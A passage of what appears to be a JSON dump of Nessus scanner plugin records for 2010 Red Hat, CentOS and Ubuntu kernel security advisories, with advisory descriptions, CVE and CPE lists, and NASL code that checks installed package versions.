(NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo\nfiles, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and\n'vport_delete'. These two files were world-writable by default,\nallowing a local user to change SCSI host attributes. This flaw only\naffects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The\n'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/')\nhad world-writable permissions. This could allow local, unprivileged\nusers to change the behavior of the driver. (CVE-2009-3889,\nCVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci\ndriver used for OHCI compliant IEEE 1394 controllers. A local,\nunprivileged user with access to /dev/fw* files could issue certain\nIOCTL calls, causing a denial of service or privilege escalation. The\nFireWire modules are blacklisted by default, and if enabled, only root\nhas access to the files noted above by default. (CVE-2009-4138,\nModerate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in\nthe HFS file system implementation. This could lead to a denial of\nservice if a user browsed a specially crafted HFS file system, for\nexample, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update\n/ index.html\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-6304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-2910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3080\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3889\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://kbase.redhat.com/faq/docs/DOC-20536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0046\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0046\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-164.11.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-164.11.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-11T12:57:03", "references": ["http://www.nessus.org/u?60fd6b72", "http://www.nessus.org/u?ec445ac4"], "pluginID": "44096", "description": "Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user could send a specially crafted IOCTL request that would cause a denial of service or, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on memory, fuse_put_request() could dereference an invalid pointer, possibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper() implementation. This could allow a local, unprivileged user to leverage a use-after-free of locked, asynchronous file descriptors to cause a denial of service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243 update introduced two flaws in the routing implementation. If an attacker was able to cause a large enough number of collisions in the routing hash table (via specially crafted packets) for the emergency route flush to trigger, a deadlock could occur. Secondly, if the kernel routing cache was disabled, an uninitialized pointer would be left behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the do_coredump() function. A local attacker able to guess the file name a process is going to dump its core to, prior to the process crashing, could use this flaw to append data to the dumped core file. This issue only affects systems that have '/proc/sys/fs/suid_dumpable' set to 2 (the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable set to 2, the core file will not be recorded if the file already exists. For example, core files will not be overwritten on subsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems, 32-bit processes could access and read certain 64-bit registers by temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV) support in the qla2xxx driver, resulting in two new sysfs pseudo files, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and 'vport_delete'. These two files were world-writable by default, allowing a local user to change SCSI host attributes. This flaw only affects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The 'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/') had world-writable permissions. This could allow local, unprivileged users to change the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver used for OHCI compliant IEEE 1394 controllers. A local, unprivileged user with access to /dev/fw* files could issue certain IOCTL calls, causing a denial of service or privilege escalation. The FireWire modules are blacklisted by default, and if enabled, only root has access to the files noted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the HFS file system implementation. This could lead to a denial of service if a user browsed a specially crafted HFS file system, for example, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from www.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update / index.html\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 10, "reporter": "Tenable", "published": "2010-01-21T00:00:00", "title": "CentOS 5 : kernel (CESA-2010:0046)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel-PAE-devel", "p-cpe:/a:centos:centos:kernel-xen-devel", "p-cpe:/a:centos:centos:kernel-xen", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:kernel-PAE", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2010-0046.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44096", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0046 and \n# CentOS Errata and Security Advisory 2010:0046 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44096);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_bugtraq_id(36576, 37019, 37068, 37069, 37339, 37806);\n script_xref(name:\"RHSA\", value:\"2010:0046\");\n\n script_name(english:\"CentOS 5 : kernel (CESA-2010:0046)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user\ncould send a specially crafted IOCTL request that would cause a denial\nof service or, possibly, privilege escalation. (CVE-2009-3080,\nImportant)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer,\npossibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to\nleverage a use-after-free of locked, asynchronous file descriptors to\ncause a denial of service or privilege escalation. (CVE-2009-4141,\nImportant)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an\nattacker was able to cause a large enough number of collisions in the\nrouting hash table (via specially crafted packets) for the emergency\nroute flush to trigger, a deadlock could occur. Secondly, if the\nkernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing,\ncould use this flaw to append data to the dumped core file. This issue\nonly affects systems that have '/proc/sys/fs/suid_dumpable' set to 2\n(the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With\nsuid_dumpable set to 2, the core file will not be recorded if the file\nalready exists. For example, core files will not be overwritten on\nsubsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910,\nModerate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo\nfiles, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and\n'vport_delete'. These two files were world-writable by default,\nallowing a local user to change SCSI host attributes. This flaw only\naffects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The\n'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/')\nhad world-writable permissions. This could allow local, unprivileged\nusers to change the behavior of the driver. (CVE-2009-3889,\nCVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci\ndriver used for OHCI compliant IEEE 1394 controllers. A local,\nunprivileged user with access to /dev/fw* files could issue certain\nIOCTL calls, causing a denial of service or privilege escalation. The\nFireWire modules are blacklisted by default, and if enabled, only root\nhas access to the files noted above by default. (CVE-2009-4138,\nModerate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in\nthe HFS file system implementation. This could lead to a denial of\nservice if a user browsed a specially crafted HFS file system, for\nexample, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update\n/ index.html\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-January/016479.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec445ac4\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-January/016480.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fd6b72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-devel-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-devel-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-doc-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-headers-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-2.6.18-164.11.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-devel-2.6.18-164.11.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-29T19:18:57", "references": ["https://usn.ubuntu.com/894-1/"], "pluginID": "44399", "description": "Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. If a user were tricked into mounting a specially crafted filesystem, a remote attacker could crash the system or gain root privileges.\n(CVE-2009-4020, CVE-2009-4308)\n\nIt was discovered that FUSE did not correctly check certain requests.\nA local attacker with access to FUSE mounts could exploit this to crash the system or possibly gain root privileges. Ubuntu 9.10 was not affected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n\nIt was discovered that the OHCI fireware driver did not correctly handle certain ioctls. A local attacker could exploit this to crash the system, or possibly gain root privileges. Ubuntu 6.06 was not affected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. A local attacker could exploit this to gain root privileges. Only Ubuntu 9.04 and 9.10 were affected.\n(CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames.\nAn attacker on the local network could send specially crafted traffic to bypass packet filters, crash the system, or possibly gain root privileges. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that 'print-fatal-signals' reporting could show arbitrary kernel memory contents. A local attacker could exploit this, leading to a loss of privacy. By default this is disabled in Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. A remote attacker could exploit this to crash the system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2010-0006)\n\nFlorian Westphal discovered that bridging netfilter rules could be modified by unprivileged users. A local attacker could disrupt network traffic, leading to a denial of service. (CVE-2010-0007)\n\nAl Viro discovered that certain mremap operations could leak kernel memory. A local attacker could exploit this to consume all available memory, leading to a denial of service. (CVE-2010-0291).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 10, "reporter": "Tenable", "published": "2010-02-05T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : linux, linux-source-2.6.15 vulnerabilities (USN-894-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0007", "CVE-2009-4141", "CVE-2010-0291", "CVE-2009-4538", "CVE-2009-4020", "CVE-2009-4536", "CVE-2009-4308", "CVE-2009-4021", "CVE-2010-0003", "CVE-2009-4031", "CVE-2010-0006", "CVE-2009-4138"], "modified": "2018-11-28T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev", "p-cpe:/a:canonical:ubuntu_linux:linux-kernel-devel", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-xeon", "p-cpe:/a:canonical:ubuntu_linux:linux-doc", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-rt", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-xeon", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-rt", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-server", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-k8", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-dove-z0", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.27", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ec2", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.27", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-xen", "p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.28", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpiacompat", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-dove", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.24", 